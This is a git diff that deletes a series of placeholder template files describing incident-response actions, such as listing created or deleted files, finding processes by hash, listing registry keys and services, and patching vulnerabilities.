--- a/Atomic_Threat_Coverage/Response_Actions/RA_2301_list_files_created.md
+++ /dev/null
@@ -1,15 +0,0 @@
-| Title                       | List files created         |
-|:---------------------------:|:--------------------|
-| **ID**                      | RA2301            |
-| **Description**             | List files that have been created at a particular time in the past   |
-| **Author**                  | your name/nickname/twitter        |
-| **Creation Date**           | DD.MM.YYYY |
-| **Category**                | File      |
-| **Stage**                   |[RS0002: Identification](../Response_Stages/RS0002.md)| 
-| **References** |<ul><li>[https://example.com](https://example.com)</li></ul>|
-| **Requirements** |<ul><li>DN_zeek_conn_log</li></ul>|
-
-### Workflow
-
-Description of the workflow for single Response Action in markdown format.  
-Here newlines will be saved.
diff --git a/Atomic_Threat_Coverage/Response_Actions/RA_2302_list_files_modified.md b/Atomic_Threat_Coverage/Response_Actions/RA_2302_list_files_modified.md
deleted file mode 100644
index 4e6cad9..0000000
--- a/Atomic_Threat_Coverage/Response_Actions/RA_2302_list_files_modified.md
+++ /dev/null
@@ -1,15 +0,0 @@
-| Title                       | List files modified         |
-|:---------------------------:|:--------------------|
-| **ID**                      | RA2302            |
-| **Description**             | List files that have been modified at a particular time in the past   |
-| **Author**                  | your name/nickname/twitter        |
-| **Creation Date**           | DD.MM.YYYY |
-| **Category**                | File      |
-| **Stage**                   |[RS0002: Identification](../Response_Stages/RS0002.md)| 
-| **References** |<ul><li>[https://example.com](https://example.com)</li></ul>|
-| **Requirements** |<ul><li>DN_zeek_conn_log</li></ul>|
-
-### Workflow
-
-Description of the workflow for single Response Action in markdown format.  
-Here newlines will be saved.
diff --git a/Atomic_Threat_Coverage/Response_Actions/RA_2303_list_files_deleted.md b/Atomic_Threat_Coverage/Response_Actions/RA_2303_list_files_deleted.md
deleted file mode 100644
index 8bd579e..0000000
--- a/Atomic_Threat_Coverage/Response_Actions/RA_2303_list_files_deleted.md
+++ /dev/null
@@ -1,15 +0,0 @@
-| Title                       | List files deleted         |
-|:---------------------------:|:--------------------|
-| **ID**                      | RA2303            |
-| **Description**             | List files that have been deleted at a particular time in the past   |
-| **Author**                  | your name/nickname/twitter        |
-| **Creation Date**           | DD.MM.YYYY |
-| **Category**                | File      |
-| **Stage**                   |[RS0002: Identification](../Response_Stages/RS0002.md)| 
-| **References** |<ul><li>[https://example.com](https://example.com)</li></ul>|
-| **Requirements** |<ul><li>DN_zeek_conn_log</li></ul>|
-
-### Workflow
-
-Description of the workflow for single Response Action in markdown format.  
-Here newlines will be saved.
diff --git a/Atomic_Threat_Coverage/Response_Actions/RA_2304_list_files_downloaded.md b/Atomic_Threat_Coverage/Response_Actions/RA_2304_list_files_downloaded.md
deleted file mode 100644
index 30261ad..0000000
--- a/Atomic_Threat_Coverage/Response_Actions/RA_2304_list_files_downloaded.md
+++ /dev/null
@@ -1,15 +0,0 @@
-| Title                       | List files downloaded         |
-|:---------------------------:|:--------------------|
-| **ID**                      | RA2304            |
-| **Description**             | List files that have been downloaded at a particular time in the past   |
-| **Author**                  | your name/nickname/twitter        |
-| **Creation Date**           | DD.MM.YYYY |
-| **Category**                | File      |
-| **Stage**                   |[RS0002: Identification](../Response_Stages/RS0002.md)| 
-| **References** |<ul><li>[https://example.com](https://example.com)</li></ul>|
-| **Requirements** |<ul><li>DN_zeek_conn_log</li></ul>|
-
-### Workflow
-
-Description of the workflow for single Response Action in markdown format.  
-Here newlines will be saved.
diff --git a/Atomic_Threat_Coverage/Response_Actions/RA_2305_list_files_with_tampered_timestamps.md b/Atomic_Threat_Coverage/Response_Actions/RA_2305_list_files_with_tampered_timestamps.md
deleted file mode 100644
index 01a468a..0000000
--- a/Atomic_Threat_Coverage/Response_Actions/RA_2305_list_files_with_tampered_timestamps.md
+++ /dev/null
@@ -1,15 +0,0 @@
-| Title                       | List files with tampered timestamps         |
-|:---------------------------:|:--------------------|
-| **ID**                      | RA2305            |
-| **Description**             | List files with tampered timestamps   |
-| **Author**                  | your name/nickname/twitter        |
-| **Creation Date**           | DD.MM.YYYY |
-| **Category**                | File      |
-| **Stage**                   |[RS0002: Identification](../Response_Stages/RS0002.md)| 
-| **References** |<ul><li>[https://example.com](https://example.com)</li></ul>|
-| **Requirements** |<ul><li>DN_zeek_conn_log</li></ul>|
-
-### Workflow
-
-Description of the workflow for single Response Action in markdown format.  
-Here newlines will be saved.
diff --git a/Atomic_Threat_Coverage/Response_Actions/RA_2306_find_file_by_path.md b/Atomic_Threat_Coverage/Response_Actions/RA_2306_find_file_by_path.md
deleted file mode 100644
index 4605f3c..0000000
--- a/Atomic_Threat_Coverage/Response_Actions/RA_2306_find_file_by_path.md
+++ /dev/null
@@ -1,15 +0,0 @@
-| Title                       | Find file by path         |
-|:---------------------------:|:--------------------|
-| **ID**                      | RA2306            |
-| **Description**             | Find a file by its path (including its name)   |
-| **Author**                  | your name/nickname/twitter        |
-| **Creation Date**           | DD.MM.YYYY |
-| **Category**                | File      |
-| **Stage**                   |[RS0002: Identification](../Response_Stages/RS0002.md)| 
-| **References** |<ul><li>[https://example.com](https://example.com)</li></ul>|
-| **Requirements** |<ul><li>DN_zeek_conn_log</li></ul>|
-
-### Workflow
-
-Description of the workflow for single Response Action in markdown format.  
-Here newlines will be saved.
diff --git a/Atomic_Threat_Coverage/Response_Actions/RA_2307_find_file_by_metadata.md b/Atomic_Threat_Coverage/Response_Actions/RA_2307_find_file_by_metadata.md
deleted file mode 100644
index 8b05d3c..0000000
--- a/Atomic_Threat_Coverage/Response_Actions/RA_2307_find_file_by_metadata.md
+++ /dev/null
@@ -1,15 +0,0 @@
-| Title                       | Find file by metadata         |
-|:---------------------------:|:--------------------|
-| **ID**                      | RA2307            |
-| **Description**             | Find a file by its metadata (i.e. signature, permissions, MAC times)   |
-| **Author**                  | your name/nickname/twitter        |
-| **Creation Date**           | DD.MM.YYYY |
-| **Category**                | File      |
-| **Stage**                   |[RS0002: Identification](../Response_Stages/RS0002.md)| 
-| **References** |<ul><li>[https://example.com](https://example.com)</li></ul>|
-| **Requirements** |<ul><li>DN_zeek_conn_log</li></ul>|
-
-### Workflow
-
-Description of the workflow for single Response Action in markdown format.  
-Here newlines will be saved.
diff --git a/Atomic_Threat_Coverage/Response_Actions/RA_2308_find_file_by_hash.md b/Atomic_Threat_Coverage/Response_Actions/RA_2308_find_file_by_hash.md
deleted file mode 100644
index e808cd7..0000000
--- a/Atomic_Threat_Coverage/Response_Actions/RA_2308_find_file_by_hash.md
+++ /dev/null
@@ -1,15 +0,0 @@
-| Title                       | Find file by hash         |
-|:---------------------------:|:--------------------|
-| **ID**                      | RA2308            |
-| **Description**             | Find a file by its hash   |
-| **Author**                  | your name/nickname/twitter        |
-| **Creation Date**           | DD.MM.YYYY |
-| **Category**                | File      |
-| **Stage**                   |[RS0002: Identification](../Response_Stages/RS0002.md)| 
-| **References** |<ul><li>[https://example.com](https://example.com)</li></ul>|
-| **Requirements** |<ul><li>DN_zeek_conn_log</li></ul>|
-
-### Workflow
-
-Description of the workflow for single Response Action in markdown format.  
-Here newlines will be saved.
diff --git a/Atomic_Threat_Coverage/Response_Actions/RA_2309_find_file_by_format.md b/Atomic_Threat_Coverage/Response_Actions/RA_2309_find_file_by_format.md
deleted file mode 100644
index ee6a663..0000000
--- a/Atomic_Threat_Coverage/Response_Actions/RA_2309_find_file_by_format.md
+++ /dev/null
@@ -1,15 +0,0 @@
-| Title                       | Find file by format         |
-|:---------------------------:|:--------------------|
-| **ID**                      | RA2309            |
-| **Description**             | Find a file by its format   |
-| **Author**                  | your name/nickname/twitter        |
-| **Creation Date**           | DD.MM.YYYY |
-| **Category**                | File      |
-| **Stage**                   |[RS0002: Identification](../Response_Stages/RS0002.md)| 
-| **References** |<ul><li>[https://example.com](https://example.com)</li></ul>|
-| **Requirements** |<ul><li>DN_zeek_conn_log</li></ul>|
-
-### Workflow
-
-Description of the workflow for single Response Action in markdown format.  
-Here newlines will be saved.
diff --git a/Atomic_Threat_Coverage/Response_Actions/RA_2310_find_file_by_content_pattern.md b/Atomic_Threat_Coverage/Response_Actions/RA_2310_find_file_by_content_pattern.md
deleted file mode 100644
index b92acf2..0000000
--- a/Atomic_Threat_Coverage/Response_Actions/RA_2310_find_file_by_content_pattern.md
+++ /dev/null
@@ -1,15 +0,0 @@
-| Title                       | Find file by content pattern         |
-|:---------------------------:|:--------------------|
-| **ID**                      | RA2310            |
-| **Description**             | Find a file by its content pattern (i.e. specific string, keyword, binary pattern etc)   |
-| **Author**                  | your name/nickname/twitter        |
-| **Creation Date**           | DD.MM.YYYY |
-| **Category**                | File      |
-| **Stage**                   |[RS0002: Identification](../Response_Stages/RS0002.md)| 
-| **References** |<ul><li>[https://example.com](https://example.com)</li></ul>|
-| **Requirements** |<ul><li>DN_zeek_conn_log</li></ul>|
-
-### Workflow
-
-Description of the workflow for single Response Action in markdown format.  
-Here newlines will be saved.
diff --git a/Atomic_Threat_Coverage/Response_Actions/RA_2311_collect_file.md b/Atomic_Threat_Coverage/Response_Actions/RA_2311_collect_file.md
deleted file mode 100644
index 6d45f3f..0000000
--- a/Atomic_Threat_Coverage/Response_Actions/RA_2311_collect_file.md
+++ /dev/null
@@ -1,15 +0,0 @@
-| Title                       | Collect file         |
-|:---------------------------:|:--------------------|
-| **ID**                      | RA2311            |
-| **Description**             | Collect a specific file from a (remote) host or a system   |
-| **Author**                  | your name/nickname/twitter        |
-| **Creation Date**           | DD.MM.YYYY |
-| **Category**                | File      |
-| **Stage**                   |[RS0002: Identification](../Response_Stages/RS0002.md)| 
-| **References** |<ul><li>[https://example.com](https://example.com)</li></ul>|
-| **Requirements** |<ul><li>DN_zeek_conn_log</li></ul>|
-
-### Workflow
-
-Description of the workflow for single Response Action in markdown format.  
-Here newlines will be saved.
diff --git a/Atomic_Threat_Coverage/Response_Actions/RA_2312_analyse_file_hash.md b/Atomic_Threat_Coverage/Response_Actions/RA_2312_analyse_file_hash.md
deleted file mode 100644
index db49147..0000000
--- a/Atomic_Threat_Coverage/Response_Actions/RA_2312_analyse_file_hash.md
+++ /dev/null
@@ -1,15 +0,0 @@
-| Title                       | Analyse file hash         |
-|:---------------------------:|:--------------------|
-| **ID**                      | RA2312            |
-| **Description**             | Analise a hash of a file   |
-| **Author**                  | your name/nickname/twitter        |
-| **Creation Date**           | DD.MM.YYYY |
-| **Category**                | File      |
-| **Stage**                   |[RS0002: Identification](../Response_Stages/RS0002.md)| 
-| **References** |<ul><li>[https://example.com](https://example.com)</li></ul>|
-| **Requirements** |<ul><li>DN_zeek_conn_log</li></ul>|
-
-### Workflow
-
-Description of the workflow for single Response Action in markdown format.  
-Here newlines will be saved.
diff --git a/Atomic_Threat_Coverage/Response_Actions/RA_2313_analyse_windows_pe.md b/Atomic_Threat_Coverage/Response_Actions/RA_2313_analyse_windows_pe.md
deleted file mode 100644
index e9d0477..0000000
--- a/Atomic_Threat_Coverage/Response_Actions/RA_2313_analyse_windows_pe.md
+++ /dev/null
@@ -1,15 +0,0 @@
-| Title                       | Analyse Windows PE         |
-|:---------------------------:|:--------------------|
-| **ID**                      | RA2313            |
-| **Description**             | Analise MS Windows Portable Executable   |
-| **Author**                  | your name/nickname/twitter        |
-| **Creation Date**           | DD.MM.YYYY |
-| **Category**                | File      |
-| **Stage**                   |[RS0002: Identification](../Response_Stages/RS0002.md)| 
-| **References** |<ul><li>[https://example.com](https://example.com)</li></ul>|
-| **Requirements** |<ul><li>DN_zeek_conn_log</li></ul>|
-
-### Workflow
-
-Description of the workflow for single Response Action in markdown format.  
-Here newlines will be saved.
diff --git a/Atomic_Threat_Coverage/Response_Actions/RA_2314_analyse_macos_macho.md b/Atomic_Threat_Coverage/Response_Actions/RA_2314_analyse_macos_macho.md
deleted file mode 100644
index d519c2c..0000000
--- a/Atomic_Threat_Coverage/Response_Actions/RA_2314_analyse_macos_macho.md
+++ /dev/null
@@ -1,15 +0,0 @@
-| Title                       | Analyse macos macho         |
-|:---------------------------:|:--------------------|
-| **ID**                      | RA2314            |
-| **Description**             | Analise macOS Mach-O   |
-| **Author**                  | your name/nickname/twitter        |
-| **Creation Date**           | DD.MM.YYYY |
-| **Category**                | File      |
-| **Stage**                   |[RS0002: Identification](../Response_Stages/RS0002.md)| 
-| **References** |<ul><li>[https://example.com](https://example.com)</li></ul>|
-| **Requirements** |<ul><li>DN_zeek_conn_log</li></ul>|
-
-### Workflow
-
-Description of the workflow for single Response Action in markdown format.  
-Here newlines will be saved.
diff --git a/Atomic_Threat_Coverage/Response_Actions/RA_2315_analyse_unix_elf.md b/Atomic_Threat_Coverage/Response_Actions/RA_2315_analyse_unix_elf.md
deleted file mode 100644
index a495de6..0000000
--- a/Atomic_Threat_Coverage/Response_Actions/RA_2315_analyse_unix_elf.md
+++ /dev/null
@@ -1,15 +0,0 @@
-| Title                       | Analyse Unix ELF         |
-|:---------------------------:|:--------------------|
-| **ID**                      | RA2315            |
-| **Description**             | Analise Unix ELF   |
-| **Author**                  | your name/nickname/twitter        |
-| **Creation Date**           | DD.MM.YYYY |
-| **Category**                | File      |
-| **Stage**                   |[RS0002: Identification](../Response_Stages/RS0002.md)| 
-| **References** |<ul><li>[https://example.com](https://example.com)</li></ul>|
-| **Requirements** |<ul><li>DN_zeek_conn_log</li></ul>|
-
-### Workflow
-
-Description of the workflow for single Response Action in markdown format.  
-Here newlines will be saved.
diff --git a/Atomic_Threat_Coverage/Response_Actions/RA_2316_analyse_ms_office_file.md b/Atomic_Threat_Coverage/Response_Actions/RA_2316_analyse_ms_office_file.md
deleted file mode 100644
index 6f47d4d..0000000
--- a/Atomic_Threat_Coverage/Response_Actions/RA_2316_analyse_ms_office_file.md
+++ /dev/null
@@ -1,15 +0,0 @@
-| Title                       | Analyse MS office file         |
-|:---------------------------:|:--------------------|
-| **ID**                      | RA2316            |
-| **Description**             | Analise MS Office file   |
-| **Author**                  | your name/nickname/twitter        |
-| **Creation Date**           | DD.MM.YYYY |
-| **Category**                | File      |
-| **Stage**                   |[RS0002: Identification](../Response_Stages/RS0002.md)| 
-| **References** |<ul><li>[https://example.com](https://example.com)</li></ul>|
-| **Requirements** |<ul><li>DN_zeek_conn_log</li></ul>|
-
-### Workflow
-
-Description of the workflow for single Response Action in markdown format.  
-Here newlines will be saved.
diff --git a/Atomic_Threat_Coverage/Response_Actions/RA_2317_analyse_pdf_file.md b/Atomic_Threat_Coverage/Response_Actions/RA_2317_analyse_pdf_file.md
deleted file mode 100644
index ea74811..0000000
--- a/Atomic_Threat_Coverage/Response_Actions/RA_2317_analyse_pdf_file.md
+++ /dev/null
@@ -1,15 +0,0 @@
-| Title                       | Analyse PDF file         |
-|:---------------------------:|:--------------------|
-| **ID**                      | RA2317            |
-| **Description**             | Analise PDF file   |
-| **Author**                  | your name/nickname/twitter        |
-| **Creation Date**           | DD.MM.YYYY |
-| **Category**                | File      |
-| **Stage**                   |[RS0002: Identification](../Response_Stages/RS0002.md)| 
-| **References** |<ul><li>[https://example.com](https://example.com)</li></ul>|
-| **Requirements** |<ul><li>DN_zeek_conn_log</li></ul>|
-
-### Workflow
-
-Description of the workflow for single Response Action in markdown format.  
-Here newlines will be saved.
diff --git a/Atomic_Threat_Coverage/Response_Actions/RA_2318_analyse_script.md b/Atomic_Threat_Coverage/Response_Actions/RA_2318_analyse_script.md
deleted file mode 100644
index e448f06..0000000
--- a/Atomic_Threat_Coverage/Response_Actions/RA_2318_analyse_script.md
+++ /dev/null
@@ -1,14 +0,0 @@
-| Title                       | Analyse script         |
-|:---------------------------:|:--------------------|
-| **ID**                      | RA2318            |
-| **Description**             | Analyse a script file (i.e. Python, PowerShell, Bash scripts etc)   |
-| **Author**                  | your name/nickname/twitter        |
-| **Creation Date**           | DD.MM.YYYY |
-| **Category**                | File      |
-| **Stage**                   |[RS0002: Identification](../Response_Stages/RS0002.md)| 
-| **References** |<ul><li>[https://example.com](https://example.com)</li></ul>|
-
-### Workflow
-
-Description of the workflow for single Response Action in markdown format.  
-Here newlines will be saved.  
diff --git a/Atomic_Threat_Coverage/Response_Actions/RA_2401_list_processes_executed.md b/Atomic_Threat_Coverage/Response_Actions/RA_2401_list_processes_executed.md
deleted file mode 100644
index f786293..0000000
--- a/Atomic_Threat_Coverage/Response_Actions/RA_2401_list_processes_executed.md
+++ /dev/null
@@ -1,15 +0,0 @@
-| Title                       | List processes executed         |
-|:---------------------------:|:--------------------|
-| **ID**                      | RA2401            |
-| **Description**             | List processes being executed at the moment or at a particular time in the past   |
-| **Author**                  | name/nickname/twitter        |
-| **Creation Date**           | DD.MM.YYYY |
-| **Category**                | Process      |
-| **Stage**                   |[RS0002: Identification](../Response_Stages/RS0002.md)| 
-| **Automation** |<ul><li>thehive</li></ul>|
-| **References** |<ul><li>[https://example.com](https://example.com)</li></ul>|
-
-### Workflow
-
-Description of the workflow for the Response Action in markdown format.  
-Here newlines will be saved.  
diff --git a/Atomic_Threat_Coverage/Response_Actions/RA_2402_find_process_by_executable_path.md b/Atomic_Threat_Coverage/Response_Actions/RA_2402_find_process_by_executable_path.md
deleted file mode 100644
index d36c68f..0000000
--- a/Atomic_Threat_Coverage/Response_Actions/RA_2402_find_process_by_executable_path.md
+++ /dev/null
@@ -1,15 +0,0 @@
-| Title                       | Find process by executable path         |
-|:---------------------------:|:--------------------|
-| **ID**                      | RA2402            |
-| **Description**             | Find a process that is being executed at the moment or at a particular time in the past by its executable path (including its name)   |
-| **Author**                  | your name/nickname/twitter        |
-| **Creation Date**           | DD.MM.YYYY |
-| **Category**                | Process      |
-| **Stage**                   |[RS0002: Identification](../Response_Stages/RS0002.md)| 
-| **References** |<ul><li>[https://example.com](https://example.com)</li></ul>|
-| **Requirements** |<ul><li>DN_zeek_conn_log</li></ul>|
-
-### Workflow
-
-Description of the workflow for single Response Action in markdown format.  
-Here newlines will be saved.
diff --git a/Atomic_Threat_Coverage/Response_Actions/RA_2403_find_process_by_executable_metadata.md b/Atomic_Threat_Coverage/Response_Actions/RA_2403_find_process_by_executable_metadata.md
deleted file mode 100644
index 37478a9..0000000
--- a/Atomic_Threat_Coverage/Response_Actions/RA_2403_find_process_by_executable_metadata.md
+++ /dev/null
@@ -1,15 +0,0 @@
-| Title                       | Find process by executable metadata         |
-|:---------------------------:|:--------------------|
-| **ID**                      | RA2403            |
-| **Description**             | Find a process that is being executed at the moment or at a particular time in the past by its executable metadata (i.e. signature, permissions, MAC times)   |
-| **Author**                  | your name/nickname/twitter        |
-| **Creation Date**           | DD.MM.YYYY |
-| **Category**                | Process      |
-| **Stage**                   |[RS0002: Identification](../Response_Stages/RS0002.md)| 
-| **References** |<ul><li>[https://example.com](https://example.com)</li></ul>|
-| **Requirements** |<ul><li>DN_zeek_conn_log</li></ul>|
-
-### Workflow
-
-Description of the workflow for single Response Action in markdown format.  
-Here newlines will be saved.
diff --git a/Atomic_Threat_Coverage/Response_Actions/RA_2404_find_process_by_executable_hash.md b/Atomic_Threat_Coverage/Response_Actions/RA_2404_find_process_by_executable_hash.md
deleted file mode 100644
index 2faca82..0000000
--- a/Atomic_Threat_Coverage/Response_Actions/RA_2404_find_process_by_executable_hash.md
+++ /dev/null
@@ -1,15 +0,0 @@
-| Title                       | Find process by executable hash         |
-|:---------------------------:|:--------------------|
-| **ID**                      | RA2404            |
-| **Description**             | Find a process that is being executed at the moment or at a particular time in the past by its executable hash   |
-| **Author**                  | your name/nickname/twitter        |
-| **Creation Date**           | DD.MM.YYYY |
-| **Category**                | Process      |
-| **Stage**                   |[RS0002: Identification](../Response_Stages/RS0002.md)| 
-| **References** |<ul><li>[https://example.com](https://example.com)</li></ul>|
-| **Requirements** |<ul><li>DN_zeek_conn_log</li></ul>|
-
-### Workflow
-
-Description of the workflow for single Response Action in markdown format.  
-Here newlines will be saved.
diff --git a/Atomic_Threat_Coverage/Response_Actions/RA_2405_find_process_by_executable_format.md b/Atomic_Threat_Coverage/Response_Actions/RA_2405_find_process_by_executable_format.md
deleted file mode 100644
index 44b09dc..0000000
--- a/Atomic_Threat_Coverage/Response_Actions/RA_2405_find_process_by_executable_format.md
+++ /dev/null
@@ -1,15 +0,0 @@
-| Title                       | Find process by executable format         |
-|:---------------------------:|:--------------------|
-| **ID**                      | RA2405            |
-| **Description**             | Find a process that is being executed at the moment or at a particular time in the past by its executable format   |
-| **Author**                  | your name/nickname/twitter        |
-| **Creation Date**           | DD.MM.YYYY |
-| **Category**                | Process      |
-| **Stage**                   |[RS0002: Identification](../Response_Stages/RS0002.md)| 
-| **References** |<ul><li>[https://example.com](https://example.com)</li></ul>|
-| **Requirements** |<ul><li>DN_zeek_conn_log</li></ul>|
-
-### Workflow
-
-Description of the workflow for single Response Action in markdown format.  
-Here newlines will be saved.
diff --git a/Atomic_Threat_Coverage/Response_Actions/RA_2406_find_process_by_executable_content_pattern.md b/Atomic_Threat_Coverage/Response_Actions/RA_2406_find_process_by_executable_content_pattern.md
deleted file mode 100644
index 09e572a..0000000
--- a/Atomic_Threat_Coverage/Response_Actions/RA_2406_find_process_by_executable_content_pattern.md
+++ /dev/null
@@ -1,15 +0,0 @@
-| Title                       | Find process by executable content pattern         |
-|:---------------------------:|:--------------------|
-| **ID**                      | RA2406            |
-| **Description**             | Find a process that is being executed at the moment or at a particular time in the past by its executable content (i.e. specific string, keyword, binary pattern etc)   |
-| **Author**                  | your name/nickname/twitter        |
-| **Creation Date**           | DD.MM.YYYY |
-| **Category**                | Process      |
-| **Stage**                   |[RS0002: Identification](../Response_Stages/RS0002.md)| 
-| **References** |<ul><li>[https://example.com](https://example.com)</li></ul>|
-| **Requirements** |<ul><li>DN_zeek_conn_log</li></ul>|
-
-### Workflow
-
-Description of the workflow for single Response Action in markdown format.  
-Here newlines will be saved.
diff --git a/Atomic_Threat_Coverage/Response_Actions/RA_2501_list_registry_keys_modified.md b/Atomic_Threat_Coverage/Response_Actions/RA_2501_list_registry_keys_modified.md
deleted file mode 100644
index e827a72..0000000
--- a/Atomic_Threat_Coverage/Response_Actions/RA_2501_list_registry_keys_modified.md
+++ /dev/null
@@ -1,15 +0,0 @@
-| Title                       | List registry keys modified         |
-|:---------------------------:|:--------------------|
-| **ID**                      | RA2501            |
-| **Description**             | List registry keys modified at a particular time in the past   |
-| **Author**                  | name/nickname/twitter        |
-| **Creation Date**           | DD.MM.YYYY |
-| **Category**                | Configuration      |
-| **Stage**                   |[RS0002: Identification](../Response_Stages/RS0002.md)| 
-| **Automation** |<ul><li>thehive</li></ul>|
-| **References** |<ul><li>[https://example.com](https://example.com)</li></ul>|
-
-### Workflow
-
-Description of the workflow for the Response Action in markdown format.  
-Here newlines will be saved.  
diff --git a/Atomic_Threat_Coverage/Response_Actions/RA_2502_list_registry_keys_deleted.md b/Atomic_Threat_Coverage/Response_Actions/RA_2502_list_registry_keys_deleted.md
deleted file mode 100644
index 03fb3e8..0000000
--- a/Atomic_Threat_Coverage/Response_Actions/RA_2502_list_registry_keys_deleted.md
+++ /dev/null
@@ -1,15 +0,0 @@
-| Title                       | List registry keys deleted         |
-|:---------------------------:|:--------------------|
-| **ID**                      | RA2502            |
-| **Description**             | List registry keys that have been deleted at a particular time in the past   |
-| **Author**                  | your name/nickname/twitter        |
-| **Creation Date**           | DD.MM.YYYY |
-| **Category**                | Configuration      |
-| **Stage**                   |[RS0002: Identification](../Response_Stages/RS0002.md)| 
-| **References** |<ul><li>[https://example.com](https://example.com)</li></ul>|
-| **Requirements** |<ul><li>DN_zeek_conn_log</li></ul>|
-
-### Workflow
-
-Description of the workflow for single Response Action in markdown format.  
-Here newlines will be saved.
diff --git a/Atomic_Threat_Coverage/Response_Actions/RA_2503_list_registry_keys_accessed.md b/Atomic_Threat_Coverage/Response_Actions/RA_2503_list_registry_keys_accessed.md
deleted file mode 100644
index 14ae2fa..0000000
--- a/Atomic_Threat_Coverage/Response_Actions/RA_2503_list_registry_keys_accessed.md
+++ /dev/null
@@ -1,15 +0,0 @@
-| Title                       | List registry keys accessed         |
-|:---------------------------:|:--------------------|
-| **ID**                      | RA2503            |
-| **Description**             | List registry keys that have been accessed at a particular time in the past   |
-| **Author**                  | your name/nickname/twitter        |
-| **Creation Date**           | DD.MM.YYYY |
-| **Category**                | Configuration      |
-| **Stage**                   |[RS0002: Identification](../Response_Stages/RS0002.md)| 
-| **References** |<ul><li>[https://example.com](https://example.com)</li></ul>|
-| **Requirements** |<ul><li>DN_zeek_conn_log</li></ul>|
-
-### Workflow
-
-Description of the workflow for single Response Action in markdown format.  
-Here newlines will be saved.
diff --git a/Atomic_Threat_Coverage/Response_Actions/RA_2504_list_registry_keys_created.md b/Atomic_Threat_Coverage/Response_Actions/RA_2504_list_registry_keys_created.md
deleted file mode 100644
index bbcba1f..0000000
--- a/Atomic_Threat_Coverage/Response_Actions/RA_2504_list_registry_keys_created.md
+++ /dev/null
@@ -1,15 +0,0 @@
-| Title                       | List registry keys created         |
-|:---------------------------:|:--------------------|
-| **ID**                      | RA2504            |
-| **Description**             | List registry keys that have been created at a particular time in the past   |
-| **Author**                  | your name/nickname/twitter        |
-| **Creation Date**           | DD.MM.YYYY |
-| **Category**                | Configuration      |
-| **Stage**                   |[RS0002: Identification](../Response_Stages/RS0002.md)| 
-| **References** |<ul><li>[https://example.com](https://example.com)</li></ul>|
-| **Requirements** |<ul><li>DN_zeek_conn_log</li></ul>|
-
-### Workflow
-
-Description of the workflow for single Response Action in markdown format.  
-Here newlines will be saved.
diff --git a/Atomic_Threat_Coverage/Response_Actions/RA_2505_list_services_created.md b/Atomic_Threat_Coverage/Response_Actions/RA_2505_list_services_created.md
deleted file mode 100644
index ef65703..0000000
--- a/Atomic_Threat_Coverage/Response_Actions/RA_2505_list_services_created.md
+++ /dev/null
@@ -1,15 +0,0 @@
-| Title                       | List services created         |
-|:---------------------------:|:--------------------|
-| **ID**                      | RA2505            |
-| **Description**             | List services that have been created at a particular time in the past   |
-| **Author**                  | your name/nickname/twitter        |
-| **Creation Date**           | DD.MM.YYYY |
-| **Category**                | Configuration      |
-| **Stage**                   |[RS0002: Identification](../Response_Stages/RS0002.md)| 
-| **References** |<ul><li>[https://example.com](https://example.com)</li></ul>|
-| **Requirements** |<ul><li>DN_zeek_conn_log</li></ul>|
-
-### Workflow
-
-Description of the workflow for single Response Action in markdown format.  
-Here newlines will be saved.
diff --git a/Atomic_Threat_Coverage/Response_Actions/RA_2506_list_services_modified.md b/Atomic_Threat_Coverage/Response_Actions/RA_2506_list_services_modified.md
deleted file mode 100644
index dda45e9..0000000
--- a/Atomic_Threat_Coverage/Response_Actions/RA_2506_list_services_modified.md
+++ /dev/null
@@ -1,15 +0,0 @@
-| Title                       | List services modified         |
-|:---------------------------:|:--------------------|
-| **ID**                      | RA2506            |
-| **Description**             | List services that have been modified at a particular time in the past   |
-| **Author**                  | your name/nickname/twitter        |
-| **Creation Date**           | DD.MM.YYYY |
-| **Category**                | Configuration      |
-| **Stage**                   |[RS0002: Identification](../Response_Stages/RS0002.md)| 
-| **References** |<ul><li>[https://example.com](https://example.com)</li></ul>|
-| **Requirements** |<ul><li>DN_zeek_conn_log</li></ul>|
-
-### Workflow
-
-Description of the workflow for single Response Action in markdown format.  
-Here newlines will be saved.
diff --git a/Atomic_Threat_Coverage/Response_Actions/RA_2507_list_services_deleted.md b/Atomic_Threat_Coverage/Response_Actions/RA_2507_list_services_deleted.md
deleted file mode 100644
index 3344462..0000000
--- a/Atomic_Threat_Coverage/Response_Actions/RA_2507_list_services_deleted.md
+++ /dev/null
@@ -1,15 +0,0 @@
-| Title                       | List services deleted         |
-|:---------------------------:|:--------------------|
-| **ID**                      | RA2507            |
-| **Description**             | List services that have been deleted at a particular time in the past   |
-| **Author**                  | your name/nickname/twitter        |
-| **Creation Date**           | DD.MM.YYYY |
-| **Category**                | Configuration      |
-| **Stage**                   |[RS0002: Identification](../Response_Stages/RS0002.md)| 
-| **References** |<ul><li>[https://example.com](https://example.com)</li></ul>|
-| **Requirements** |<ul><li>DN_zeek_conn_log</li></ul>|
-
-### Workflow
-
-Description of the workflow for single Response Action in markdown format.  
-Here newlines will be saved.
diff --git a/Atomic_Threat_Coverage/Response_Actions/RA_2601_list_users_authenticated.md b/Atomic_Threat_Coverage/Response_Actions/RA_2601_list_users_authenticated.md
deleted file mode 100644
index 78eab00..0000000
--- a/Atomic_Threat_Coverage/Response_Actions/RA_2601_list_users_authenticated.md
+++ /dev/null
@@ -1,15 +0,0 @@
-| Title                       | List users authenticated         |
-|:---------------------------:|:--------------------|
-| **ID**                      | RA2601            |
-| **Description**             | List users authenticated at a particular time in the past on a particular system   |
-| **Author**                  | name/nickname/twitter        |
-| **Creation Date**           | DD.MM.YYYY |
-| **Category**                | Identity      |
-| **Stage**                   |[RS0002: Identification](../Response_Stages/RS0002.md)| 
-| **Automation** |<ul><li>thehive</li></ul>|
-| **References** |<ul><li>[https://example.com](https://example.com)</li></ul>|
-
-### Workflow
-
-Description of the workflow for the Response Action in markdown format.  
-Here newlines will be saved.
diff --git a/Atomic_Threat_Coverage/Response_Actions/RA_3001_patch_vulnerability.md b/Atomic_Threat_Coverage/Response_Actions/RA_3001_patch_vulnerability.md
deleted file mode 100644
index 3bdb36c..0000000
--- a/Atomic_Threat_Coverage/Response_Actions/RA_3001_patch_vulnerability.md
+++ /dev/null
@@ -1,15 +0,0 @@
-| Title                       | Patch vulnerability         |
-|:---------------------------:|:--------------------|
-| **ID**                      | RA3001            |
-| **Description**             | Patch a vulnerability in an asset   |
-| **Author**                  | name/nickname/twitter        |
-| **Creation Date**           | DD.MM.YYYY |
-| **Category**                | General      |
-| **Stage**                   |[RS0003: Containment](../Response_Stages/RS0003.md)| 
-| **Automation** |<ul><li>thehive</li></ul>|
-| **References** |<ul><li>[https://example.com](https://example.com)</li></ul>|
-
-### Workflow
-
-Description of the workflow for the Response Action in markdown format.  
